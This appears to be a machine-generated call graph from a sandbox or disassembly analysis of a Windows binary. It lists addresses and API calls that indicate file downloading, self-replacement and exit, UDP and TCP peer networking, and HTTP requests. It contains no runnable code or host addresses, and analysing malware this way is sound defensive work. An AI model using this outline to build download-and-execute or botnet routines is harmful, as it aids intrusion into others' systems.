GetCurrentProcessId HeapValidate HeapFree 4916->4917 4918 404867 _invalid_parameter 4916->4918 4917->4916 4919 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4918->4919 4920 40488d 4918->4920 4919->4918 4920->4873 4921->4915 4921->4916 4923 402820 _invalid_parameter 7 API calls 4922->4923 4924 403d7f _invalid_parameter 4923->4924 4925 403ca0 _invalid_parameter 9 API calls 4924->4925 4927 403db8 _invalid_parameter 4925->4927 4926 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4926->4927 4927->4926 4928 403de3 4927->4928 4928->4888 4930 40a6d2 4929->4930 4933 40a620 4930->4933 4934 40a950 __aligned_recalloc_base 7 API calls 4933->4934 4941 40a630 4934->4941 4937 40ab60 __aligned_recalloc_base 3 API calls 4939 4084bf 4937->4939 4938 40a66c 4938->4937 4939->4792 4941->4938 4941->4939 4942 409b50 4941->4942 4949 40a140 4941->4949 4954 40a510 4941->4954 4943 409b63 4942->4943 4948 409b59 4942->4948 4944 409ba6 memset 4943->4944 4943->4948 4945 409bc7 4944->4945 4944->4948 4946 409bcd memcpy 4945->4946 4945->4948 4962 409920 4946->4962 4948->4941 4950 40a14d 4949->4950 4951 40a157 4949->4951 4950->4941 4951->4950 4952 40a24f memcpy 4951->4952 4967 409e70 4951->4967 4952->4951 4956 40a526 4954->4956 4960 40a51c 4954->4960 4955 409e70 64 API calls 4957 40a5a7 4955->4957 4956->4955 4956->4960 4958 409920 6 API calls 4957->4958 4957->4960 4959 40a5c6 4958->4959 4959->4960 4961 40a5db memcpy 4959->4961 4960->4941 4961->4960 4963 40996e 4962->4963 4965 40992e 4962->4965 4963->4948 4965->4963 4966 409860 6 API calls 4965->4966 4966->4965 4968 409e8a 4967->4968 4970 409e80 4967->4970 4968->4970 4977 409cb0 4968->4977 4970->4951 4972 409fc8 memcpy 4972->4970 4974 409fe7 memcpy 4975 40a111 4974->4975 4976 409e70 62 API calls 4975->4976 4976->4970 4978 409cc7 4977->4978 4986 409cbd 4977->4986 4980 409d55 4978->4980 4981 409d38 4978->4981 4985 409d50 4978->4985 4978->4986 4982 409920 6 API calls 4980->4982 4984 409920 6 API calls 4981->4984 4982->4985 4984->4985 4988 409610 4985->4988 4986->4970 4986->4972 4986->4974 4987 409dfc memset 4987->4986 4989 40961f 4988->4989 4990 409629 4988->4990 4989->4986 4989->4987 4990->4989 4991 4094e0 9 API calls 4990->4991 4992 409722 4991->4992 4993 40a950 __aligned_recalloc_base 7 API calls 4992->4993 4994 409771 4993->4994 4994->4989 4995 409350 46 API calls 4994->4995 4996 40979e 4995->4996 4997 40ab60 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4996->4997 4997->4989 5017 40a800 GetCurrentProcessId 4998->5017 5000 40a99b 5001 40a820 __aligned_recalloc_base 5 API calls 5000->5001 5006 40a9a7 __aligned_recalloc_base 5000->5006 5001->5006 5002 405d55 5002->4778 5002->4783 5003 40aa50 HeapAlloc 5003->5006 5004 40aa1a HeapReAlloc 5004->5006 5005 40aaa0 __aligned_recalloc_base HeapValidate 5005->5006 5006->5002 5006->5003 5006->5004 5006->5005 5007 40ab60 __aligned_recalloc_base 3 API calls 5006->5007 5007->5006 5011 40cb4b 5008->5011 5009 40a950 __aligned_recalloc_base 7 API calls 5009->5011 5010 405ded 5010->4783 5012 4076c0 5010->5012 5011->5009 5011->5010 5013 40a950 __aligned_recalloc_base 7 API calls 5012->5013 5014 4076d0 5013->5014 5015 407717 5014->5015 5016 4076dc memcpy CreateThread 5014->5016 5015->4783 5016->5015 5018 407720 GetTickCount srand rand Sleep 5016->5018 5017->5000 5019 407757 5018->5019 5020 4077ad 5018->5020 5021 4077ab 5019->5021 5024 407766 StrChrA 5019->5024 5028 40f560 9 API calls 5019->5028 5020->5021 5022 40f560 58 API calls 5020->5022 5023 40ab60 __aligned_recalloc_base 3 API calls 5021->5023 5022->5021 5025 4077d8 5023->5025 5024->5019 5029 40f623 InternetOpenUrlW 5028->5029 5030 40f78e InternetCloseHandle Sleep 5028->5030 5033 40f781 InternetCloseHandle 5029->5033 5034 40f652 CreateFileW 5029->5034 5031 40f7b5 6 API calls 5030->5031 5032 407795 Sleep 5030->5032 5031->5032 5035 40f831 wsprintfW DeleteFileW Sleep 5031->5035 5032->5019 5033->5030 5036 40f681 InternetReadFile 5034->5036 5055 40f75e 5034->5055 5039 40f240 18 API calls 5035->5039 5037 40f6d4 wsprintfW DeleteFileW Sleep 5036->5037 5038 40f6a5 5036->5038 5057 40f240 CreateFileW 5037->5057 5038->5037 5040 40f6ae WriteFile 5038->5040 5041 40f871 5039->5041 5040->5036 5043 40f87b Sleep 5041->5043 5044 40f8af DeleteFileW 5041->5044 5046 40f400 6 API calls 5043->5046 5044->5032 5050 40f892 5046->5050 5048 40f767 DeleteFileW 5048->5055 5049 40f72b Sleep 5052 40f400 6 API calls 5049->5052 5051 40f8ad 5050->5051 5053 40f8a5 ExitProcess 5050->5053 5051->5032 5054 40f742 5052->5054 5054->5055 5056 40f756 ExitProcess 5054->5056 5055->5033 5058 40f285 CreateFileMappingW 5057->5058 5059 40f386 5057->5059 5058->5059 5061 40f2a6 MapViewOfFile 5058->5061 5060 40f3a0 CreateFileW 5059->5060 5069 40f3f1 5059->5069 5063 40f3c2 WriteFile 5060->5063 5064 40f3e8 5060->5064 5061->5059 5062 40f2c5 GetFileSize 5061->5062 5065 40f2e1 5062->5065 5066 40f37c UnmapViewOfFile 5062->5066 5063->5064 5067 40ab60 __aligned_recalloc_base 3 API calls 5064->5067 5077 40d1a0 5065->5077 5066->5059 5067->5069 5069->5048 5069->5049 5071 40cb40 7 API calls 5072 40f330 5071->5072 5072->5066 5073 40f34d memcmp 5072->5073 5073->5066 5074 40f369 5073->5074 5075 40ab60 __aligned_recalloc_base 3 API calls 5074->5075 5076 40f372 5075->5076 5076->5066 5078 40cbd0 10 API calls 5077->5078 5079 40d1c4 5078->5079 5079->5066 5079->5071 5081 40e2ee 5080->5081 5082 40e1bd htons inet_addr setsockopt 5080->5082 5081->4555 5083 40b430 8 API calls 5082->5083 5084 40e236 bind lstrlenA sendto ioctlsocket 5083->5084 5088 40e28b 5084->5088 5085 40e2b2 5137 40b4f0 shutdown closesocket 5085->5137 5088->5085 5089 40a990 9 API calls 5088->5089 5128 40e310 5088->5128 5089->5088 5144 40e640 memset InternetCrackUrlA InternetOpenA 5090->5144 5093 40e51e 5093->4555 5095 40e4eb 5096 40ab60 __aligned_recalloc_base 3 API calls 5095->5096 5096->5093 5102 40e4e1 SysFreeString 5102->5095 5251 40b3f0 inet_addr 5105->5251 5108 40b4dd 5113 40eef0 5108->5113 5109 40b48c connect 5110 40b4a0 getsockname 5109->5110 5111 40b4d4 5109->5111 5110->5111 5254 40b4f0 shutdown closesocket 5111->5254 5255 40b3d0 inet_ntoa 5113->5255 5115 40ef06 5116 40d470 11 API calls 5115->5116 5117 40ef25 5116->5117 5123 40e14c 5117->5123 5256 40ef70 memset InternetCrackUrlA InternetOpenA 5117->5256 5120 40ef5c 5122 40ab60 __aligned_recalloc_base 3 API calls 5120->5122 5121 40ab60 __aligned_recalloc_base 3 API calls 5121->5120 5122->5123 5123->4564 5127 40ac84 5124->5127 5125 40ac8a 5125->4556 5126 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5126->5127 5127->5125 5127->5126 5133 40e32c 5128->5133 5129 40e3f4 5129->5088 5130 40e348 recvfrom 5131 40e376 StrCmpNIA 5130->5131 5132 40e369 Sleep 5130->5132 5131->5133 5134 40e395 StrStrIA 5131->5134 5132->5133 5133->5129 5133->5130 5134->5133 5135 40e3b6 StrChrA 5134->5135 5138 40d320 5135->5138 5137->5081 5139 40d32b 5138->5139 5140 40d331 lstrlenA 5139->5140 5141 40a950 __aligned_recalloc_base 7 API calls 5139->5141 5142 40d360 memcpy 5139->5142 5143 40d344 5139->5143 5140->5139 5140->5143 5141->5139 5142->5139 5142->5143 5143->5133 5145 40e6e1 InternetConnectA 5144->5145 5146 40e41a 5144->5146 5147 40e84a InternetCloseHandle 5145->5147 5148 40e71a HttpOpenRequestA 5145->5148 5146->5093 5157 40e530 5146->5157 5147->5146 5149 40e750 HttpSendRequestA 5148->5149 5150 40e83d InternetCloseHandle 5148->5150 5151 40e830 InternetCloseHandle 5149->5151 5154 40e76d 5149->5154 5150->5147 5151->5150 5152 40e7bb 5152->5151 5153 40e78e InternetReadFile 5153->5152 5153->5154 5154->5152 5154->5153 5155 40a990 9 API calls 5154->5155 5156 40e7d6 memcpy 5155->5156 5156->5154 5186 40d250 5157->5186 5160 40e433 5160->5095 5167 40eea0 5160->5167 5161 40e55a SysAllocString 5162 40e571 CoCreateInstance 5161->5162 5163 40e627 5161->5163 5164 40e61d SysFreeString 5162->5164 5166 40e596 5162->5166 5165 40ab60 __aligned_recalloc_base 3 API calls 5163->5165 5164->5163 5165->5160 5166->5164 5203 40e9f0 5167->5203 5170 40e870 5208 40ecc0 5170->5208 5175 40ee20 6 API calls 5176 40e8c7 5175->5176 5181 40e4b2 5176->5181 5225 40eae0 5176->5225 5179 40e8ff 5179->5181 5230 40e990 5179->5230 5180 40eae0 6 API calls 5180->5179 5181->5102 5183 40d470 5181->5183 5246 40d3e0 5183->5246 5190 40d25d 5186->5190 5187 40d263 lstrlenA 5188 40d276 5187->5188 5187->5190 5188->5160 5188->5161 5190->5187 5190->5188 5191 40a950 __aligned_recalloc_base 7 API calls 5190->5191 5193 40ab60 __aligned_recalloc_base 3 API calls 5190->5193 5194 405740 5190->5194 5198 4056f0 5190->5198 5191->5190 5193->5190 5195 405757 MultiByteToWideChar 5194->5195 5196 40574a lstrlenA 5194->5196 5197 40577c 5195->5197 5196->5195 5197->5190 5199 4056fb 5198->5199 5200 405701 lstrlenA 5199->5200 5201 405740 2 API calls 5199->5201 5202 405737 5199->5202 5200->5199 5201->5199 5202->5190 5204 40ea16 5203->5204 5205 40ea93 lstrcmpiW 5204->5205 5206 40e49d 5204->5206 5207 40eaab SysFreeString 5204->5207 5205->5204 5205->5207 5206->5095 5206->5170 5207->5204 5209 40ece6 5208->5209 5210 40e88b 5209->5210 5211 40ed73 lstrcmpiW 5209->5211 5210->5181 5220 40ee20 5210->5220 5212 40edf3 SysFreeString 5211->5212 5213 40ed86 5211->5213 5212->5210 5214 40e990 2 API calls 5213->5214 5216 40ed94 5214->5216 5215 40ede5 5215->5212 5216->5212 5216->5215 5217 40edc3 lstrcmpiW 5216->5217 5218 40edd5 5217->5218 5219 40eddb SysFreeString 5217->5219 5218->5219 5219->5215 5221 40e990 2 API calls 5220->5221 5223 40ee3b 5221->5223 5222 40e8a9 5222->5175 5222->5181 5223->5222 5224 40ecc0 6 API calls 5223->5224 5224->5222 5226 40e990 2 API calls 5225->5226 5228 40eafb 5226->5228 5227 40e8e5 5227->5179 5227->5180 5228->5227 5234 40eb60 5228->5234 5232 40e9b6 5230->5232 5231 40e9cd 5231->5181 5232->5231 5233 40e9f0 2 API calls 5232->5233 5233->5231 5236 40eb86 5234->5236 5235 40ec9d 5235->5227 5236->5235 5237 40ec13 lstrcmpiW 5236->5237 5238 40ec93 SysFreeString 5237->5238 5239 40ec26 5237->5239 5238->5235 5240 40e990 2 API calls 5239->5240 5242 40ec34 5240->5242 5241 40ec85 5241->5238 5242->5238 5242->5241 5243 40ec63 lstrcmpiW 5242->5243 5244 40ec75 5243->5244 5245 40ec7b SysFreeString 5243->5245 5244->5245 5245->5241 5250 40d3ed 5246->5250 5247 40d390 _vscprintf wvsprintfA 5247->5250 5248 40d408 SysFreeString 5248->5102 5249 40a990 9 API calls 5249->5250 5250->5247 5250->5248 5250->5249 5252 40b409 gethostbyname 5251->5252 5253 40b41c socket 5251->5253 5252->5253 5253->5108 5253->5109 5254->5108 5255->5115 5257 40ef47 5256->5257 5258 40f014 InternetConnectA 5256->5258 5257->5120 5257->5121 5259 40f194 InternetCloseHandle 5258->5259 5260 40f04d HttpOpenRequestA 5258->5260 5259->5257 5261 40f083 HttpAddRequestHeadersA HttpSendRequestA 5260->5261 5262 40f187 InternetCloseHandle 5260->5262 5263 40f17a InternetCloseHandle 5261->5263 5266 40f0cd 5261->5266 5262->5259 5263->5262 5264 40f0e4 InternetReadFile 5265 40f111 5264->5265 5264->5266 5265->5263 5266->5264 5266->5265 5267 40a990 9 API calls 5266->5267 5268 40f12c memcpy 5267->5268 5268->5266 5275 407417 5269->5275 5270 407670 CoCreateInstance 5270->5275 5271 4075eb 5273 4075f4 SysFreeString 5271->5273 5274 4073bb SysFreeString 5271->5274 5272 40ab60 __aligned_recalloc_base 3 API calls 5272->5271 5273->5274 5274->4568 5275->5270 5276 407566 SysAllocString 5275->5276 5277 407432 5275->5277 5276->5275 5276->5277 5277->5271 5277->5272 5279 40c87a 5278->5279 5280 40c87e 5278->5280 5279->4574 5282 40c830 CryptAcquireContextW 5280->5282 5283 40c86b 5282->5283 5284 40c84d CryptGenRandom CryptReleaseContext 5282->5284 5283->5279 5284->5283 5285->4596 5337 40b780 gethostname 5286->5337 5289 40b869 5289->4596 5291 40b87c strcmp 5291->5289 5292 40b891 5291->5292 5341 40b3d0 inet_ntoa 5292->5341 5294 40b89f strstr 5295 40b8f0 5294->5295 5296 40b8af 5294->5296 5342 40b3d0 inet_ntoa 5295->5342 5344 40b3d0 inet_ntoa 5296->5344 5299 40b8bd strstr 5299->5289 5301 40b8cd 5299->5301 5300 40b8fe strstr 5302 40b90e 5300->5302 5303 40b94f 5300->5303 5345 40b3d0 inet_ntoa 5301->5345 5346 40b3d0 inet_ntoa 5302->5346 5343 40b3d0 inet_ntoa 5303->5343 5307 40b95d strstr 5310 40b96d 5307->5310 5311 40b9ae EnterCriticalSection 5307->5311 5308 40b8db strstr 5308->5289 5308->5295 5309 40b91c strstr 5309->5289 5312 40b92c 5309->5312 5348 40b3d0 inet_ntoa 5310->5348 5314 40b9c6 5311->5314 5347 40b3d0 inet_ntoa 5312->5347 5322 40b9f1 5314->5322 5350 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5314->5350 5316 40b97b strstr 5316->5289 5318 40b98b 5316->5318 5317 40b93a strstr 5317->5289 5317->5303 5349 40b3d0 inet_ntoa 5318->5349 5321 40baea LeaveCriticalSection 5321->5289 5322->5321 5324 40a740 7 API calls 5322->5324 5323 40b999 strstr 5323->5289 5323->5311 5325 40ba35 5324->5325 5325->5321 5351 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5325->5351 5327 40ba53 5328 40ba80 5327->5328 5329 40ba76 Sleep 5327->5329 5331 40baa5 5327->5331 5330 40ab60 __aligned_recalloc_base 3 API calls 5328->5330 5329->5327 5330->5331 5331->5321 5352 40b530 5331->5352 5334 40b530 13 API calls 5333->5334 5335 40b523 LeaveCriticalSection 5334->5335 5335->4594 5336->4600 5338 40b7a7 gethostbyname 5337->5338 5339 40b7c3 5337->5339 5338->5339 5339->5289 5340 40b3d0 inet_ntoa 5339->5340 5340->5291 5341->5294 5342->5300 5343->5307 5344->5299 5345->5308 5346->5309 5347->5317 5348->5316 5349->5323 5350->5322 5351->5327 5353 40b544 5352->5353 5360 40b53f 5352->5360 5354 40a950 __aligned_recalloc_base 7 API calls 5353->5354 5356 40b558 5354->5356 5355 40b5b4 CreateFileW 5357 40b603 InterlockedExchange 5355->5357 5358 40b5d7 WriteFile FlushFileBuffers 5355->5358 5356->5355 5356->5360 5359 40ab60 __aligned_recalloc_base 3 API calls 5357->5359 5358->5357 5359->5360 5360->5321 5364 40dcdd 5361->5364 5362 40dc13 5362->4607 5362->4608 5363 40dd01 WaitForSingleObject 5363->5364 5364->5362 5364->5363 5366 40bdd3 WaitForSingleObject 5365->5366 5367 40be01 5366->5367 5368 40bdeb InterlockedDecrement 5366->5368 5369 40bdfa 5368->5369 5369->5366 5370 40b510 15 API calls 5369->5370 5370->5369 5430 4013b0 5371->5430 5374 40dff7 InterlockedExchangeAdd 5375 40e03b WaitForSingleObject 5374->5375 5377 40dfdd 5374->5377 5376 40e054 5375->5376 5375->5377 5450 401330 5376->5450 5377->5374 5377->5375 5380 40e05d 5377->5380 5442 40bbb0 EnterCriticalSection 5377->5442 5447 40bed0 5377->5447 5382 401f92 5381->5382 5383 402008 5381->5383 5384 401f97 WSAGetOverlappedResult 5382->5384 5529 401d60 5382->5529 5384->5382 5385 401fb9 WSAGetLastError 5384->5385 5385->5382 5387 401fd3 GetQueuedCompletionStatus 5387->5382 5387->5383 5570 401470 5388->5570 5390 40e084 5391 40e0af 5390->5391 5392 40e095 WaitForSingleObject 5390->5392 5393 401330 7 API calls 5392->5393 5393->5391 5584 4021b0 5394->5584 5397 40d9c2 5398 40d9a5 WaitForSingleObject 5588 401600 5398->5588 5402 401ac9 5401->5402 5403 40194d WSAWaitForMultipleEvents 5401->5403 5404 4019f0 GetTickCount 5403->5404 5405 40196a WSAEnumNetworkEvents 5403->5405 5406 401a43 GetTickCount 5404->5406 5407 401a05 EnterCriticalSection 5404->5407 5405->5404 5420 401983 5405->5420 5410 401ab5 WaitForSingleObject 5406->5410 5411 401a4e EnterCriticalSection 5406->5411 5408 401a16 5407->5408 5409 401a3a LeaveCriticalSection 5407->5409 5415 401a29 LeaveCriticalSection 5408->5415 5652 401820 5408->5652 5409->5410 5410->5402 5410->5403 5413 401aa1 LeaveCriticalSection GetTickCount 5411->5413 5414 401a5f InterlockedExchangeAdd 5411->5414 5412 401992 accept 5412->5404 5412->5420 5413->5410 5670 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5414->5670 5415->5410 5419 401a72 5419->5413 5419->5414 5671 40b4f0 shutdown closesocket 5419->5671 5420->5404 5420->5412 5422 4019e9 5420->5422 5632 4022c0 5420->5632 5423 401cf0 7 API calls 5422->5423 5423->5404 5425 40d934 5424->5425 5426 40bbb0 5 API calls 5425->5426 5427 40d950 WaitForSingleObject 5425->5427 5429 40d975 5425->5429 5685 40d550 InterlockedExchangeAdd 5425->5685 5426->5425 5427->5425 5427->5429 5431 40a740 7 API calls 5430->5431 5432 4013bb CreateEventA socket 5431->5432 5433 4013f2 5432->5433 5437 4013f8 5432->5437 5434 401330 7 API calls 5433->5434 5434->5437 5435 401401 bind 5438 401444 CreateThread 5435->5438 5439 401434 5435->5439 5436 401462 5436->5377 5437->5435 5437->5436 5438->5436 5460 401100 5438->5460 5440 401330 7 API calls 5439->5440 5441 40143a 5440->5441 5441->5377 5443 40bbe7 LeaveCriticalSection 5442->5443 5444 40bbcf 5442->5444 5443->5377 5445 40c870 3 API calls 5444->5445 5446 40bbda 5445->5446 5446->5443 5489 40be30 5447->5489 5451 401339 5450->5451 5459 40139b 5450->5459 5452 401341 SetEvent WaitForSingleObject 5451->5452 5451->5459 5457 401362 5452->5457 5453 40138b 5528 40b4f0 shutdown closesocket 5453->5528 5455 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5455->5457 5456 401395 5458 40ab60 __aligned_recalloc_base 3 API calls 5456->5458 5457->5453 5457->5455 5458->5459 5459->5380 5461 401115 ioctlsocket 5460->5461 5462 4011e4 5461->5462 5468 40113a 5461->5468 5464 40ab60 __aligned_recalloc_base 3 API calls 5462->5464 5463 4011cd WaitForSingleObject 5463->5461 5463->5462 5465 4011ea 5464->5465 5466 40a990 9 API calls 5466->5468 5467 401168 recvfrom 5467->5463 5467->5468 5468->5463 5468->5466 5468->5467 5469 4011ad InterlockedExchangeAdd 5468->5469 5471 401000 5469->5471 5472 401014 5471->5472 5474 40a740 7 API calls 5472->5474 5476 40103b 5472->5476 5474->5476 5475 40105b 5483 401580 5475->5483 5482 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5476->5482 5478 4010ec 5478->5468 5479 4010a3 IsBadReadPtr 5481 401071 5479->5481 5480 4010d8 memmove 5480->5481 5481->5478 5481->5479 5481->5480 5482->5475 5484 401592 5483->5484 5485 4015a5 memcpy 5483->5485 5486 40a990 9 API calls 5484->5486 5488 4015c1 5485->5488 5487 40159f 5486->5487 5487->5485 5488->5481 5490 40c8b0 3 API calls 5489->5490 5491 40be3b 5490->5491 5492 40be57 lstrlenA 5491->5492 5493 40cb40 7 API calls 5492->5493 5494 40be8d 5493->5494 5495 40beb8 5494->5495 5500 40dfa0 5494->5500 5503 40d6b0 5494->5503 5495->5377 5496 40beac 5497 40ab60 __aligned_recalloc_base 3 API calls 5496->5497 5497->5495 5508 401200 5500->5508 5502 40dfc2 5502->5496 5524 40d710 5503->5524 5506 40d6de 5506->5496 5507 40d710 send 5507->5506 5509 40121d 5508->5509 5522 401314 5508->5522 5510 40a950 __aligned_recalloc_base 7 API calls 5509->5510 5509->5522 5511 401247 memcpy htons 5510->5511 5512 401297 sendto 5511->5512 5517 4012ed 5511->5517 5514 4012b6 InterlockedExchangeAdd 5512->5514 5515 4012e9 5512->5515 5513 40ab60 __aligned_recalloc_base 3 API calls 5518 4012fc 5513->5518 5514->5512 5519 4012cc 5514->5519 5516 40130a 5515->5516 5515->5517 5520 40ab60 __aligned_recalloc_base 3 API calls 5516->5520 5517->5513 5518->5502 5521 40ab60 __aligned_recalloc_base 3 API calls 5519->5521 5520->5522 5523 4012db 5521->5523 5522->5502 5523->5502 5525 40d721 send 5524->5525 5526 40d6c3 5525->5526 5527 40d73e 5525->5527 5526->5506 5526->5507 5527->5525 5527->5526 5528->5456 5530 401ef2 InterlockedDecrement setsockopt closesocket 5529->5530 5531 401d74 5529->5531 5548 401e39 5530->5548 5531->5530 5532 401d7c 5531->5532 5549 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5532->5549 5534 401d81 InterlockedExchange 5535 401d98 5534->5535 5536 401e4e 5534->5536 5541 401da9 InterlockedDecrement 5535->5541 5542 401dbc InterlockedDecrement InterlockedExchangeAdd 5535->5542 5535->5548 5537 401e67 5536->5537 5538 401e57 InterlockedDecrement 5536->5538 5539 401e72 5537->5539 5540 401e87 InterlockedDecrement 5537->5540 5538->5387 5558 401ae0 WSASend 5539->5558 5544 401ee9 5540->5544 5541->5387 5545 401e2f 5542->5545 5544->5387 5550 401cf0 5545->5550 5546 401e7e 5546->5387 5548->5387 5549->5534 5551 401d00 InterlockedExchangeAdd 5550->5551 5552 401cfc 5550->5552 5553 401d53 5551->5553 5554 401d17 InterlockedIncrement 5551->5554 5552->5548 5553->5548 5564 401c50 WSARecv 5554->5564 5556 401d46 5556->5553 5557 401d4c InterlockedDecrement 5556->5557 5557->5553 5559 401b50 5558->5559 5560 401b12 WSAGetLastError 5558->5560 5559->5546 5560->5559 5561 401b1f 5560->5561 5562 401b56 5561->5562 5563 401b26 Sleep WSASend 5561->5563 5562->5546 5563->5559 5563->5560 5565 401cd2 5564->5565 5566 401c8e 5564->5566 5565->5556 5567 401c90 WSAGetLastError 5566->5567 5568 401ca4 Sleep WSARecv 5566->5568 5569 401cdb 5566->5569 5567->5565 5567->5566 5568->5565 5568->5567 5569->5556 5571 401483 5570->5571 5572 401572 5570->5572 5571->5572 5573 40a740 7 API calls 5571->5573 5572->5390 5574 401498 CreateEventA socket 5573->5574 5575 4014d5 5574->5575 5576 4014cf 5574->5576 5575->5572 5578 4014e2 htons setsockopt bind 5575->5578 5577 401330 7 API calls 5576->5577 5577->5575 5579 401546 5578->5579 5580 401558 CreateThread 5578->5580 5581 401330 7 API calls 5579->5581 5580->5572 5583 401100 20 API calls __aligned_recalloc_base 5580->5583 5582 40154c 5581->5582 5582->5390 5585 4021cf 5584->5585 5586 4021bb 5584->5586 5585->5397 5585->5398 5586->5585 5609 402020 5586->5609 5589 40160d 5588->5589 5608 401737 5588->5608 5590 401619 EnterCriticalSection 5589->5590 5589->5608 5591 401630 5590->5591 5592 4016b5 LeaveCriticalSection SetEvent 5590->5592 5591->5592 5595 401641 InterlockedDecrement 5591->5595 5598 40165a InterlockedExchangeAdd 5591->5598 5606 4016a0 InterlockedDecrement 5591->5606 5593 4016d0 5592->5593 5594 4016e8 5592->5594 5596 4016d6 PostQueuedCompletionStatus 5593->5596 5597 40dd50 11 API calls 5594->5597 5595->5591 5596->5594 5596->5596 5599 4016f3 5597->5599 5598->5591 5600 40166d InterlockedIncrement 5598->5600 5601 40de90 6 API calls 5599->5601 5602 401c50 4 API calls 5600->5602 5603 4016fc CloseHandle CloseHandle WSACloseEvent 5601->5603 5602->5591 5631 40b4f0 shutdown closesocket 5603->5631 5605 401724 DeleteCriticalSection 5607 40ab60 __aligned_recalloc_base 3 API calls 5605->5607 5606->5591 5607->5608 5608->5397 5610 40a740 7 API calls 5609->5610 5611 40202b 5610->5611 5612 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5611->5612 5613 4021aa 5611->5613 5614 402076 CreateIoCompletionPort 5612->5614 5615 40219f 5612->5615 5613->5585 5614->5615 5616 40208f 5614->5616 5617 401600 35 API calls 5615->5617 5618 40dbb0 8 API calls 5616->5618 5619 4021a5 5617->5619 5620 402094 5618->5620 5619->5613 5620->5615 5621 40209f WSASocketA 5620->5621 5621->5615 5622 4020bd setsockopt htons bind 5621->5622 5622->5615 5623 402126 listen 5622->5623 5623->5615 5624 40213a WSACreateEvent 5623->5624 5624->5615 5625 402147 WSAEventSelect 5624->5625 5625->5615 5626 402159 5625->5626 5627 40217f 5626->5627 5628 40dbe0 319 API calls 5626->5628 5629 40dbe0 319 API calls 5627->5629 5628->5626 5630 402194 5629->5630 5630->5585 5631->5605 5633 4022d2 EnterCriticalSection 5632->5633 5634 4022cd 5632->5634 5635 4022e7 5633->5635 5636 4022fd LeaveCriticalSection 5633->5636 5634->5420 5635->5636 5637 402308 5636->5637 5638 40230f 5636->5638 5637->5420 5639 40a740 7 API calls 5638->5639 5640 402319 5639->5640 5641 402326 getpeername CreateIoCompletionPort 5640->5641 5642 4023b8 5640->5642 5643 4023b2 5641->5643 5644 402366 5641->5644 5674 40b4f0 shutdown closesocket 5642->5674 5647 40ab60 __aligned_recalloc_base 3 API calls 5643->5647 5672 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5644->5672 5647->5642 5648 4023c3 5648->5420 5649 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5673 4021e0 EnterCriticalSection LeaveCriticalSection 5649->5673 5651 4023ab 5651->5420 5653 401830 5652->5653 5661 40190f 5652->5661 5654 40183d InterlockedExchangeAdd 5653->5654 5653->5661 5655 401854 5654->5655 5654->5661 5656 401880 5655->5656 5655->5661 5675 4017a0 EnterCriticalSection 5655->5675 5657 401891 5656->5657 5684 40b4f0 shutdown closesocket 5656->5684 5660 4018a7 InterlockedDecrement 5657->5660 5662 401901 5657->5662 5660->5662 5661->5409 5663 402247 5662->5663 5664 402265 EnterCriticalSection 5662->5664 5663->5409 5665 40229c LeaveCriticalSection DeleteCriticalSection 5664->5665 5668 40227d 5664->5668 5666 40ab60 __aligned_recalloc_base 3 API calls 5665->5666 5666->5663 5667 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5667->5668 5668->5667 5669 40229b 5668->5669 5669->5665 5670->5419 5671->5419 5672->5649 5673->5651 5674->5648 5676 401807 LeaveCriticalSection 5675->5676 5677 4017ba InterlockedExchangeAdd 5675->5677 5676->5655 5678 4017d9 5677->5678 5679 4017ca LeaveCriticalSection 5677->5679 5680 40ab60 __aligned_recalloc_base 3 API calls 5678->5680 5679->5655 5681 4017fe 5680->5681 5682 40ab60 __aligned_recalloc_base 3 API calls 5681->5682 5683 401804 5682->5683 5683->5676 5684->5657 5686 40d56d 5685->5686 5696 40d566 5685->5696 5702 40d840 5686->5702 5689 40d58d InterlockedIncrement 5699 40d597 5689->5699 5690 40bed0 18 API calls 5690->5699 5691 40d5c0 5710 40b3d0 inet_ntoa 5691->5710 5693 40d5cc 5694 40d690 InterlockedDecrement 5693->5694 5709 40b4f0 shutdown closesocket 5694->5709 5696->5425 5697 40a950 __aligned_recalloc_base 7 API calls 5697->5699 5698 40d770 6 API calls 5698->5699 5699->5690 5699->5691 5699->5694 5699->5697 5699->5698 5701 40ab60 __aligned_recalloc_base 3 API calls 5699->5701 5711 40bf20 5699->5711 5701->5699 5703 40d84d socket 5702->5703 5704 40d862 htons connect 5703->5704 5705 40d8bf 5703->5705 5704->5705 5707 40d8aa 5704->5707 5705->5703 5706 40d57d 5705->5706 5706->5689 5706->5696 5725 40b4f0 shutdown closesocket 5707->5725 5709->5696 5710->5693 5722 40bf31 5711->5722 5714 40ab60 __aligned_recalloc_base 3 API calls 5715 40c2ff 5714->5715 5715->5699 5716 40bf4f 5716->5714 5717 40c310 26 API calls 5717->5722 5718 40b830 31 API calls 5718->5722 5721 40bed0 18 API calls 5721->5722 5722->5716 5722->5717 5722->5718 5722->5721 5726 40c460 5722->5726 5733 40bc00 EnterCriticalSection 5722->5733 5738 407240 5722->5738 5743 4072e0 5722->5743 5748 407110 5722->5748 5755 407210 5722->5755 5725->5706 5727 40c471 lstrlenA 5726->5727 5728 40cb40 7 API calls 5727->5728 5731 40c48f 5728->5731 5729 40c49b 5730 40c51f 5729->5730 5732 40ab60 __aligned_recalloc_base 3 API calls 5729->5732 5730->5722 5731->5727 5731->5729 5732->5730 5735 40bc18 5733->5735 5734 40bc54 LeaveCriticalSection 5734->5722 5735->5734 5758 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5735->5758 5737 40bc43 5737->5734 5759 407280 5738->5759 5741 407279 5741->5722 5742 40dbe0 330 API calls 5742->5741 5744 407280 75 API calls 5743->5744 5745 4072ff 5744->5745 5746 40732c 5745->5746 5774 407340 5745->5774 5746->5722 5777 405fe0 EnterCriticalSection 5748->5777 5750 40712a 5754 40715d 5750->5754 5782 407170 5750->5782 5753 40ab60 __aligned_recalloc_base 3 API calls 5753->5754 5754->5722 5789 4060a0 